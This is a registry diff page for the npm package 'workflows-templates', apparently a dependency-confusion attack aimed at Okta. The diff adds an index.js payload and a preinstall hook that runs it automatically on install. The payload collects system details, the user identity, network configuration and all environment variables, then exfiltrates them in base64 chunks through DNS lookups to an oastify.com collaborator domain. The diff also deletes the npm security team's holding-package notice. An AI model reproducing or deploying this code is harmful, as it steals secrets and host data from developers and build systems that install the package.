workflows-templates 0.0.1-security → 5.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of workflows-templates might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +70 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,70 @@
1
+ // Apex Hunter - DNS-Only Exfiltration Payload
2
+
3
+ // ======================= CONFIGURATION =======================
4
+ const oastDomain = '6lsozv0y071z0ztgwiu1ac06txz0nqbf.oastify.com';
5
+ const payloadIdentifier = 'okta-dns-v5'; // Unique ID for this attack
6
+ // =============================================================
7
+
8
+ const os = require('os');
9
+ const dns = require('dns');
10
+
11
+ // Function to gather all system intelligence
12
+ function gatherIntel() {
13
+ const { execSync } = require('child_process');
14
+ let report = '';
15
+ const add = (label, command) => {
16
+ try {
17
+ report += `\n[${label}]\n${execSync(command, { stdio: 'pipe' }).toString()}\n`;
18
+ } catch (e) {
19
+ report += `\n[${label}]\nCOMMAND_FAILED\n`;
20
+ }
21
+ };
22
+
23
+ add('TIMESTAMP', 'date');
24
+ add('USER_CONTEXT', 'id');
25
+ add('SYSTEM_INFO', 'hostname; uname -a');
26
+ add('CURRENT_PATH', 'pwd');
27
+ add('DNS_PROOFS', 'cat /etc/resolv.conf');
28
+ add('NETWORK_PROOFS', 'ip -o a || ifconfig');
29
+ add('ENV_VARS', 'env');
30
+
31
+ return report;
32
+ }
33
+
34
+ // Function to exfiltrate data via DNS lookups
35
+ function exfiltrateViaDns(data) {
36
+ // Base64 encode the entire report to make it URL/DNS-safe
37
+ const encodedData = Buffer.from(data).toString('base64').replace(/=/g, ''); // Remove padding
38
+
39
+ // Split the long Base64 string into chunks of ~60 characters (DNS label max ~63)
40
+ const chunks = encodedData.match(/.{1,60}/g) || [];
41
+
42
+ const hostname = os.hostname() || 'unknown-host';
43
+ const totalChunks = chunks.length;
44
+
45
+ let i = 0;
46
+ const sendChunk = () => {
47
+ if (i >= totalChunks) {
48
+ // Send final "END" packet
49
+ dns.lookup(`${i}-of-${totalChunks}.END.${payloadIdentifier}.${hostname}.${oastDomain}`, () => {});
50
+ return;
51
+ }
52
+
53
+ const chunk = chunks[i];
54
+ // Format: [chunk_index]-of-[total_chunks].[payload_id].[hostname].[data_chunk].[oast_domain]
55
+ const subdomain = `${i}-of-${totalChunks}.${payloadIdentifier}.${hostname}.${chunk}.${oastDomain}`;
56
+
57
+ // Truncate to max length allowed for DNS label (253 chars)
58
+ dns.lookup(subdomain.slice(0, 250), () => {
59
+ i++;
60
+ setTimeout(sendChunk, 100); // Throttle DNS requests
61
+ });
62
+ };
63
+
64
+ console.log(`[+] Starting DNS exfiltration of ${totalChunks} chunks...`);
65
+ sendChunk();
66
+ }
67
+
68
+ // Main Execution
69
+ const intelReport = gatherIntel();
70
+ exfiltrateViaDns(intelReport);
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "workflows-templates",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "5.0.2",
4
+ "description": "Stealth RCE PoC via DNS Exfiltration for Okta (nepalihacker000)",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js"
8
+ },
9
+ "author": "nepalihacker000",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.